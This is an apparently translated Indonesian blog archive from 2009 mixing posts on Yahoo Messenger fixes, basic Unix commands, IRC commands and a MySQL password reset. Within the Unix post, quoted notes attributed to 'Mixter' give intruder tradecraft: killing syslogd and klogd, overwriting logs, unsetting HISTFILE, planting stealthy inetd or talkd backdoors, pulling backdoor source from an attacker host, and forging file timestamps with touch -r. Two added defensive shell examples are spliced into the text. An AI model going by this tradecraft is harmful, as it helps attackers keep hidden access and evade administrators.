Archive for June, 2009

Pidgin and Gyache cannot connect to Yahoo Messenger

Posted in Catatanku, Tutorial, Yahoo Messenger, artikel, artikel pengalaman catatan fajar, blog, catatan on June 21st, 2009 by admin

Since some date or other (I forgot the date, hehe) I kept trying to connect through Gyache and it just would not work, and the same with Pidgin.. what a hassle, I could not chat with my friends.. in the end I looked for another solution, namely using Kopete, but well.. that was a pain too.. because connecting with Kopete is rather heavy

Fed up with this situation, I finally handed it over to good old Google to find the solution.. and it turned out I found the problem here

The trick is simply to change the server from the original scs.msg.yahoo.com to cn.scs.msg.yahoo.com

Finally Managed to Do Photo Tracing

Posted in Catatanku, Tutorial, catatan on June 20th, 2009 by admin

For an amateur… like me who is still a layman when it comes to photo tracing.. this is something that makes me happy.. not bad for picking up some knowledge and just pursuing a hobby..

UNIX command

Posted in Uncategorized on June 20th, 2009 by admin

Unix Command Basics

Jasakom – Surely you would all like to know some Unix commands? The commands on the various Unix clones (BSD, Linux, SunOS, System V, SCO, IRIX, AIX) are nearly the same as one another. As an example I show how to run Linux commands; part of this I took from the Kecoak Elektronik tutorial and the sharp commands from the Israeli hacker Mixter

:: CyberBug Tutorial

UNIX COMMANDS

Before continuing, remember that in Linux/UNIX all commands are written in lowercase, and Linux/UNIX distinguishes uppercase from lowercase.

——> ls
Remember the DIR command in DOS? … well, this command is the same as DIR; it is used to display the ‘list’ of files in a directory. The ls command also comes with additional flags, which can be seen by typing:

ls --help ; display help
man ls ; man can also be read as manual, so the manual for ls

Some common ls commands are:

ls -l ; display additional information (l = long)
ls -a ; display hidden files (a = attribute)
ls -la

The additional information displayed by the -l flag covers the user who ‘owns’ the file, the date and time the file was created, the file's rights/permissions, and other information, for example:

rwxr-x--x

Notes:
characters 1-3: user/owner permissions
characters 4-6: group permissions
characters 7-9: other permissions

This is what the letters mean:

r – read permission
w – write permission
x – (e)xecute permission

So in the example above:

the user/owner can read, write and execute the file
those in the same group as the user/owner can read and execute the file
other users can execute the file
- means the permission is absent; a d before the permissions means it is a directory
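
The decoding described above, as an added example that is not part of the original tutorial: a POSIX shell function that turns an ls -l mode string into octal, extended beyond the text to the setuid, setgid and sticky characters (s, S, t, T), plus a check for the bits an administrator reviews first. The function names and the sample strings are constructed for illustration.

```shell
# mode_to_octal MODE: print the 4-digit octal form of an ls -l mode string.
mode_to_octal() (
    mode=$1
    # Drop the leading file-type character (-, d, l, ...) of a 10-char string.
    [ "${#mode}" -eq 10 ] && mode=${mode#?}
    [ "${#mode}" -eq 9 ] || { echo "bad mode: $1" >&2; exit 1; }
    special=0 digits="" pos=0 val=0
    while [ -n "$mode" ]; do
        c=${mode%"${mode#?}"}        # first remaining character
        mode=${mode#?}
        triad=$((pos / 3))           # 0 = owner, 1 = group, 2 = other
        case "$triad$((pos % 3))$c" in
            ?0r) val=$((val + 4)) ;;
            ?1w) val=$((val + 2)) ;;
            ?2x) val=$((val + 1)) ;;
            # s = setuid/setgid with execute, t = sticky with execute
            [01]2s|22t) val=$((val + 1)); special=$((special + (4 >> triad))) ;;
            # S / T = special bit set but execute bit absent
            [01]2S|22T) special=$((special + (4 >> triad))) ;;
            ??-) ;;
            *) echo "bad character '$c' in: $1" >&2; exit 1 ;;
        esac
        pos=$((pos + 1))
        if [ $((pos % 3)) -eq 0 ]; then digits=$digits$val; val=0; fi
    done
    echo "$special$digits"
)

# risky_bits MODE: print the bits worth a second look, or "none".
risky_bits() (
    oct=$(mode_to_octal "$1") || exit 1
    special=${oct%???}               # leading special-bits digit
    other=${oct#???}                 # last digit: permissions for "other"
    out=""
    [ $((special & 4)) -ne 0 ] && out="$out setuid"
    [ $((special & 2)) -ne 0 ] && out="$out setgid"
    [ $((other & 2)) -ne 0 ] && out="$out world-writable"
    out=${out# }
    echo "${out:-none}"
)

# Constructed sample mode strings; the first is the one from the text above.
for m in rwxr-x--x -rwsr-xr-x drwxrwxrwt -rw-rw-rw-; do
    printf '%-11s %s  %s\n' "$m" "$(mode_to_octal "$m")" "$(risky_bits "$m")"
done
```
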

——> cat
Cat or concatenate is used to display and write/create files, roughly the same as the TYPE command in DOS. To display the contents of a file type: "cat <filename>". To create a file type: "cat > <filename>", type the contents of the file, and to save press CTRL + C or CTRL + D. If the file name already exists the file will be overwritten; if we want the data appended to the existing file, replace > with >>

——> more
Displays the contents of a file one screen at a time; press q to quit

more jilid1.txt

——> grep
Displays all lines that contain the desired pattern

grep kecoak jilid1.txt

will display all lines of text containing kecoak in the file jilid1.txt

——> man
UNIX help/manual; type: man to run it.
man pwd

——> echo
echo is used to display what we type on the screen, for example:

echo "saya belajar linux"
saya belajar linux

or to create a file, for example:

echo "biff n" > .profile

which will create a .profile file in the active directory containing the text "biff n", or append to the file's contents by replacing > with >>

——> cp
copy, used to copy files.

cp jilid1.txt jilid1.txt.backup
cp jilid1.txt ~cyberbug/backup/jilid1.txt.backup

——> mv
move, renames a file or directory

mv jilid1.txt jilid1a.txt
mv backup bak

——> rm
remove, deletes files

rm jilid1.txt ; delete the file jilid1.txt
rm * ; delete all files in the active directory (careful!)

——> cd
change directory, used to move between directories, the same as the CD command in DOS

cd /root

note that Linux uses / (slash), not \ (backslash)

——> mkdir
make directory, creates a directory

mkdir backup

——> rmdir
remove directory, deletes a directory; the files in the directory must be deleted first before deleting the directory.

rmdir backup

——> who
who is used to display the users logged in to the system; the output looks roughly like this:

cyberservices:~$ who
root tty1 Dec 20 17:47
cyberbug tty2 Dec 20 17:48
cyberbug tty3 Dec 20 17:48
cyberbug ttyp0 Dec 20 18:43 (localhost)

The first column shows the name of the logged-in user, the second column shows the terminal line in use, the third column shows the login time, and the fourth column shows the domain or IP they are connecting from; if it is empty, they are working directly from the console.

——> whoami
If you forget yourself :) this is the command: Who am I?

cyberservices:~$ whoami
cyberbug

——> who am i
This one too, for when you have completely lost your bearings :) )

cyberservices:~$ who am i
cyberservices!cyberbug tty3 Dec 20 17:48

——> pwd
Displays the active directory, pwd = print working directory, the command to use when you are wandering around and no longer know which way is home :)

cyberservices:~$ pwd
/home/cyberbug

——> ps
Displays the active processes

cyberservices:~$ ps
PID TTY STAT TIME COMMAND
87 2 S 0:00 -bash
88 3 S 0:00 -bash
1440 2 S 0:00 pico jilid2.txt
1443 3 R 0:00 ps

——> ping
Checks whether a host is ‘up’; for the technical terms, see ‘man ping’

cyberservices:~$ ping localhost
PING localhost (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms

— localhost ping statistics —
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.1/0.2 ms
cyberservices:~$ ping 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms

— 127.0.0.1 ping statistics —
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.1/0.2 ms
cyberservices:~$

Note that localhost and 127.0.0.1 are the same :)
127.0.0.1 is the local loopback provided for testing.

——> finger

Looks up user information

cyberservices:~$ finger
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:37 Dec 22 01:10

cyberservices:~$ finger @cyberservices.com
[cyberservices.com]

Welcome to Linux version 2.0.34 at cyberservices.com !

3:46am up 2:37, 3 users, load average: 0.00, 0.00, 0.00

Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:39 Dec 22 01:10

cyberservices:~$ finger @localhost
[localhost]

Welcome to Linux version 2.0.34 at cyberservices.com !

3:47am up 2:38, 3 users, load average: 0.00, 0.00, 0.00

Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:40 Dec 22 01:10

cyberservices:~$ finger cyberbug
Login: cyberbug Name: CyberBug
Directory: /home/cyberbug Shell: /bin/bash
On since Tue Dec 22 01:10 (PHT) on tty2 8 seconds idle
On since Tue Dec 22 01:10 (PHT) on tty3
Last login Tue Dec 22 01:13 (PHT) on tty4
Mail forwarded to “|IFS=’ ‘&&exec /usr/bin/procmail -f-||exit 75
#cyberbug”
No mail.
No Plan.

cyberservices:~$ finger root
Login: root Name:
Directory: /root Shell: /bin/bash
On since Tue Dec 22 01:10 (PHT) on tty1 1 hour 42 minutes idle
Mail last read Tue Dec 15 09:19 1998 (PHT)
No Plan.

——> telnet
Communicates with another host over the telnet protocol

cyberservices:~$ telnet localhost
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.

Welcome to Linux 2.0.34.

cyberservices login: cyberbug
Password: 3m4nggu3p1k1r1n
Linux 2.0.34.
Last login: Tue Dec 22 01:13:52 on tty4.
No mail.

cyberservices:~$ telnet localhost 25
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
220 cyberservices.com ESMTP Sendmail 8.9.0/8.9.0; Tue, 22 Dec 1998
03:52:51 +0800
helo darling
250 cyberservices.com Hello cyberbug@localhost [127.0.0.1], pleased to
meet you
mail from: guest@cyberservices.com
250 guest@cyberservices.com… Sender ok
rcpt to: untukmu@seorang.jauh.disana
250 untukmu@seorang.jauh.disana… Recipient ok (will queue)
data
354 Enter mail, end with “.” on a line by itself
Kukirim lagu dan salam rinduku
.
250 EAA01615 Message accepted for delivery
quit

cyberservices:~$ telnet localhost 110
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
+OK cyberservices POP3 Server (Version 1.005l) ready at
user root
+OK please send PASS command
pass 3m4nggu3p1k1r1n
+OK 2 messages ready for root in /usr/spool/mail/root
stat
+OK 2 7227
retr 1
quit

——> ftp
Uses the file transfer program

cyberservices:~$ ftp localhost
Connected to localhost.
220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed
May 20 13:45:04 CDT 1998) ready.
Name (localhost:cyberbug): ftp
331 Guest login ok, send your complete e-mail address as password.
Password: cyberbug@k-elektronik.org
230-Welcome, archive user! … blah
blah … blah
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

ftp can also be done by telnetting to port 21

cyberservices:~$ telnet localhost 21
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed
May 20 13:45:04 CDT 1998) ready.

——> talk
Talk to another user; for example, cyberbug requests a talk with root as follows:

talk root
or
talk root@cyberservices.com

[Waiting for your party to respond]

[Ringing your party again]

On root's terminal a message will appear:

Message from Talk_Daemon@cyberservices at 4:00 …
talk: connection requested by cyberbug@localhost.
talk: respond with: talk cyberbug@localhost

root must type talk cyberbug@localhost to answer the request
talk cyberbug@localhost

[Connection established]

:: Additional Commands from Me (r3v0lt aka Intruded)

1. Command to compile a file

ex. #gcc -o namafile filekompilasi
#gcc -o pscan pscan.c
2. Command to run an executable file
ex. #./file
#./pscan
#./scaner.pl
#./scanner.sh
3. Command to stop a process
ex.# Ctrl+c
4. Command to suspend a process temporarily
ex.#ctrl+z, to come back type fg in the shell (on FreeBSD)
5. Command to change shell (on FreeBSD)
ex.#chsh -> ksh,bash,tcsh
6. Command to change the password
ex.#passwd
7. Command to look up the IP of a host
ex.#dig ip
ex.#nslookup ip
8. Editor command
ex.#pico wepedodol.c
9. Pipe command, two processes at once
ex.# ls -al | head
will display only the top part of the directory listing
10. Command to change mode
ex.#chmod +x file
r – read permission
w – write permission
x – (e)xecute permission
:: That's all for now, okay dear…..

::: Notes from Our Friend Mixter =
Here are my suggestions…

1. killall -9 syslogd klogd – pesky loggers! only few admins will notice if they get turned off. Now you can act freely.
copy secure.1 and messages.1 from /var/log over secure and messages Normally, these logs are the only ones with the intruders IP
and traces of a root compromise in them. If *.1 doesn’t exist, truncate the files. Also, unset HISTFILE is important.
Nobody does unset HISTFILE, thus leaving a .bash_history in /var/named or even /. Very unprofessional :) .

2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf… Inform yourself about the frequency the system is being
maintained, administrated, if the logfiles are being analyzed.
* Look how many people have access to it (/etc/passwd) – the more the better for you (keeps attention away from you).
* Look if the system is already backdoored!! you might want to remove other backdoors.
* Look for a loghost or snmp (dangerous because you cant manipulate the logs on a far-away loghost). Watch out for *logd, sniffers,
netmon’s etc before you do anything great on the host. If you are paranoid, traceroute the host, and see if non-routers are before that host (probably IDS, loghost, sniffer, etc).

3. This is important: DONT MANIPULATE THE SYSTEM CONFIGURATION! DOH!
It is too easy to detect you if you add yourself to /etc/passwd, or open a port by manipulating inetd.conf. Let me tell you that
root kits and /bin/login trojans are the first things any sane admin will watch for. Install a nice stealthy port backdoor. My approach
to uploading files is doing:
(on your box)

$ uuencode -m backdoor.c backdoor.c | less

(on the target box)
uudecode

# cc -o backdoor backdoor.c
A nice different method is putting a daemon on your own box, on port 666, that spits out the source code when someone telnets to
it, so you can do telnet ppp-42.haxor.net 666 > backdoor.c As I said, make sure you can get back in. If the box you rooted
has an uptime of more than 300 days or so, you might consider not installing the backdoor for startup. Instead, kill the
vulnerable daemon, and when the host restarts, come back using an exploit. Normally, you can replace a lame daemon that nobody uses
with your backdoor. Look at inetd.conf to see what daemons are active. A safe bet is in.talkd which often is activated but seldom
ever used. So, when you want to re-activate your backdoor, talk root@0wned.host.com for a second, and your backdoor is running.
You can also add /path/to/backdoor to /root/.profile.. but it is a bit riskier than the inetd backdoor method.

4. Subscribe to bugtraq, CIAC security list, or look at rootshell, to see what you need to do to patch your buggy stuff. If RPM is
installed you can try a rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm If not, use ncftp to fetch the file anonymously, because it doesn’t need user interaction. If you want, add an additional backdoor in your “patched” server. QPOP 2.53 even supports this itself.
For all files you replace, you should modify the time stamps, which wont help, if the admin uses tripwire or cksum, but if the
admin is, like most admins, a complete lamer that does find / -ctime to scan for trojans and thinks he knows his job. :P
To modify timestamps, you do a simple:

touch -r /bin/bash /path/to/your/trojan

this will copy the exact date/time info from /bin/bash over your freshly added trojan. Voila! The alternative to all this for lazy people is, to add a ipfwadm rule that prevents traffic from the outside (-W eth0) to the ports with the buggy daemons, and adding that command
to a rc.d script as well. Bind doesn’t need tcp port 53 for anything except zone transfers and the RoTShB/ADM bind exploits. It works
fine with 53/tcp firewalled. But be aware that this might get you detected, lets say if you disable port 110 or 143 on an ISP’s
central mail exchange server…

About your backdoor:
Port > 10000 is strongly recommended, also a backdoor using UDP, ICMP, or even something as unusual as raw IP is very useful.
People that bind /bin/sh to a port are idiots, because they open that host to everyone, letting in sniffers, and probably other people who may damage the host seriously. Make sure to password protect everything that runs as root. A password of a minimum length of 8 characters, because you have no way of detecting a brute force attack. For the C programmers, let me say, listen(sockfd,1). Maybe 2 connections, but not more.

For comfortability, you can add some stuff you want to occur on each successful backdoor login, like system(”w”), system(”killall -9 syslogd klogd”), or whatever. If you want a front-end backdoor with some integrated functions, try gateway[5].

——————————————————————————————
..::: JasaKom :::..

r3v0lt
aka Intruded

* http://private.localbox.net (staff only – no link)
* http://published.localbox.net (free exploits – k00lz
* http://restriction.localbox.net (staff only – no link)

Credit Mixter & CyberBug (was confirmation Sept 2001)
File = Public ! or MaYBe go to: http://published.localbox.net
————————————————————-

/*
You are welcome to copy, paste and distribute this article without limit,
provided it is for educational purposes and includes credit to
r3v0lt aka Intruded. The author and editor are not responsible for
misuse of the educational version of this article.
*/

pitiq
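
Item 4 of the quoted Mixter text notes that copied timestamps do not survive a check with tripwire or cksum. The following added example (not from the original article; the file names are constructed and the choice of hash tool is an assumption) shows that from the administrator's side: a recorded content hash flags a replaced file even after its modification time has been copied back with touch -r.

```shell
# file_hash FILE: print a content digest (sha256sum if present, else POSIX cksum).
file_hash() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum < "$1" | cut -d' ' -f1
    else
        cksum < "$1" | cut -d' ' -f1
    fi
}

# same_mtime A B: succeed if neither file is newer than the other.
same_mtime() { [ ! "$1" -nt "$2" ] && [ ! "$2" -nt "$1" ]; }

# check_file FILE REF BASELINE_HASH: print what each kind of check concludes.
check_file() (
    if same_mtime "$1" "$2"; then ts="mtime:unchanged"; else ts="mtime:changed"; fi
    if [ "$(file_hash "$1")" = "$3" ]; then h="hash:match"; else h="hash:MISMATCH"; fi
    echo "$ts $h"
)

# demo: record a baseline, replace the file, copy the timestamps back, re-check.
# Everything happens in a temporary directory with constructed file names.
demo() (
    dir=$(mktemp -d) || exit 1
    trap 'rm -rf "$dir"' EXIT
    printf 'original daemon\n' > "$dir/daemon"
    touch -r "$dir/daemon" "$dir/ref"           # ref remembers the original mtime
    baseline=$(file_hash "$dir/daemon")         # what an integrity tool stores
    printf 'replaced daemon\n' > "$dir/daemon"  # content changes
    touch -r "$dir/ref" "$dir/daemon"           # mtime copied back, as in the text
    check_file "$dir/daemon" "$dir/ref" "$baseline"
)

demo
```

touch -r copies only the access and modification times; the kernel sets the inode change time (ctime) at the moment of the touch, so ctime is a second signal alongside the stored hash.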

List of DALnet IRC Commands

Posted in Uncategorized on June 20th, 2009 by admin

mIRC and X-Chat Guide for DALnet
THE FOLLOWING IS A GUIDE TO CHATTING ON IRC

Collection of common DAL.NET commands

Basic DAL.NET commands:

/nick (new nick) = change your nickname
/notice (nick) (message) = send a notice to nick
/join (#channel) = join a channel
/say (message) = like ordinary chat
/part (#channel) = leave the channel
/msg (nick) (message) = send a msg to nick
/quit = exit IRC
/notify (nick) = to know whether that nick is online or not
/notify – (nick) = remove (nick) from the notify list
/quit (message) = quit with your message
/server (server name) = change server
/query (nick) = private msg to a user
/invite (nick) (#channel) = invite a user
/dcc chat (nick) = dcc chat with nick
/dcc send (nick) (filename) = send a file
/mode (your nick) +I = change mode to invisible (not shown to others in /who #channel)
/ignore (nick) or /ignore *@their-IP = ignore a user; none of what they write will be shown to us
/me (message) = action, the result is *(nick) (message)
to be shown in all channels we are online in
/list = view the list of all channels
/who (nick/#channel) = view information about a user or channel
/whois (nick) = view information about a user
/away (message) = leave for a moment with a message
/away = announce being back from away
/ctcp (nick) ping = check how long your typing takes to reach the user
/ctcp (your nick) ping = check your own lag
/uwho (nick) = view the U central of nick
/clear = clear the active screen


Reset the MySQL password on Ubuntu Dapper – Hardy – Intrepid – Jaunty

Posted in catatan on June 4th, 2009 by admin

After installing MySQL on Ubuntu Hardy, well.. there was one problem: it turned out the installation did not ask for a password.. quite a hassle.. after browsing here and there, I finally found it…

Type the command below in a terminal

sudo dpkg-reconfigure mysql-server-5.0

reset MySQL password

Once that comes up, just enter the new password.. then press Enter